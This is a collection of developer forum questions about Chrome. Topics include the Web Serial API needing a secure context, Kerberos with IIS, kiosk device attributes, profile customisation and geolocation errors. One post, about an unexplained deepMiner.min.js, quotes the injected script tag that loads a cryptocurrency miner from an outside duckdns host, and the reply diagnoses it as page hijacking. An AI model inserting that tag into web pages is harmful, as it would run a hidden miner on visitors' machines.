I'm developing an enterprise web app with Vue.js, and I would like to use the Web Serial API in Chrome. On the linux machine that I'm developing on, I went to this Chrome flag chrome://flags/#enable-experimental-web-platform-features and enabled it. Then I did console.log('serial' in navigator) and it returned true, meaning that the flag is enabled. All is good so far.
So I went and did the same thing on the corporate computer I need to be using (running windows 10). I enabled the flag in Chrome, restarted it, and ran console.log('serial' in navigator) on the tab running the web app, but it returns false, which is bad because I need it to be true. But when I run that code on a different tab, it returns true. How could my web app be changing the navigator? So I can't use the Web Serial API on the one computer that needs to be using it and I don't know why.
Any help is appreciated.
UPDATED. The problem is not specific from vue js, you should make the script execute from a secure environment, either localhost or from a ssl secured domain. This security concerns are covered on this draft https://wicg.github.io/serial/#security.
Related
I'm trying to determine if I can access any browser api for chrome OS that will allow me to identify the device that its running on when the application has been force-installed in kiosk mode as a PWA.
We're running into exactly the same issue right now. The correct path seems to be to create a PWA and to connect it to a (pre-installed) extension that has access to the enterprise.deviceAttributes:
See https://developers.chrome.com/apps/migration:
"If there is a capability that your Chrome App has that the regular web platform can't provide, it might be available as an extension API. In this case, you use a progressive web app together with an externally connectable extension your web app can send messages to."
enterprise.deviceAttributes are only accessible if the calling App/Site is pre-installed to the device and not loaded dynamically, so it cannot run in the PWA by design.
But with this tutorial, it seems possible:
https://developer.chrome.com/extensions/messaging#external-webpage
We're looking into that right now and will post our progess here.
So this is kind of odd.
My scenario:
Web server running IIS, hosting asp.net applications
SQL server
As they are on separate servers, I had to set up kerberos delegation. I have got this working.
So a user goes to asp.net application hosted on the web server, and it authenticates them to the SQL server.
On one of my web apps, when they go to it in Chrome, I get the error page with SQL authentication failed due to Anonymous user. If they go to the same app in IE, it works correctly.
Here is the really odd part - if they then go to it again in Chrome, it works!
So I guess there is some inconsistency in how Chrome authenticates.
I found someone suggesting it might be to do with the IIS negotiation providers, but as it needs kerberos delegation I have to have "Negotiate" as the first option or it fails completely.
I guess I could just tell users they have to use IE, but I would prefer to get it to work in Chrome.
Any thoughts?
(Possibly similar to Kerberos not working with Chrome but it's all on intranet zone, so don't think there's anything to whitelist)
what is deepMiner.min.js that suddenly shows up in web app? From chrome developer tools, it tried to load the file for 25 seconds, but failed.
https://jhondi33.duckdns.org:7777/deepMiner.min.js
The file is not explicitly included in web app.
For Microsoft Edge developer tools, it is always from cache even if cache is disabled.
UPDATE
If running the webapp from my local machine, the file did not show up in Chrome developer tools. Is this related to web hosting? But the web app is HTTPS secure.
The following is inserted into the web page that is dynamically generated (not static)
<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
it appears to be a cryptocurrency miner that can be obfuscated as something innocuous. This has been done by hijacking the webpage with injected entries. See this similar issue in a Github issue. Update the host and DNS auth.
DeepMiner
I'm using the little setup that ShimmerCat provides for web development: SOCKS5 with built-in DNS and private certificate authority. For those of you that don't know how it works, it basically means that once you start your development web server, you invoke the browser using a helper script. This script opens a browser instance with completely separated user directory and configuration. Then it is just a matter of opening the future website as it were already deployed on the Internet, the SOCKS5 and built-in DNS emulation does the magic. For example, if the site is www.my-cool-client-site.com, I just open the locally running version by typing that address in the browser.
It's all very neat and functional, but now we have deployed our real site on the Internet, and as expected everything just looks the same as in my local development setup, including the address in the browser address bar and the green padlock icon. More than once now I have found myself banging my head for "a bug" that has turned out to be me confusing the development project with the site already deployed on the Internet. Therefore my question:
Is there a way to personalize a Google Chrome profile in a very obvious way so that I can't confuse my development configuration with the normal configuration that I use to browse the Internet?
I was working on a html5 file which uses geolocation. It was working fine in Chrome version 38.0.2125.111m from both loading the file locally and from a host server. Now, Chrome does not work for geolocation from either resource. I understand the security issue when running the file locally, but it still happens from any website that is running geolocation. I get the error message of "geocode service failed". BUT runs fine from both resources using Firefox. I have a windows 7 x64 laptop. The code that I am using is right off of Google geolocation example...
I've also went to the chrome's privacy-security-location settings and checked to use allow all sites to check location and still the problem continues... Help!
I think I found a clue. I copied the geolocaton file to another website and ran fine using the same chrome version which makes me believe that it is the google api keys that was causing the problem. I deleted the keys for both local and web host and will see in a few days if indeed this was the case. If it is, then I suggest not to establish api keys during development until app is ready for production.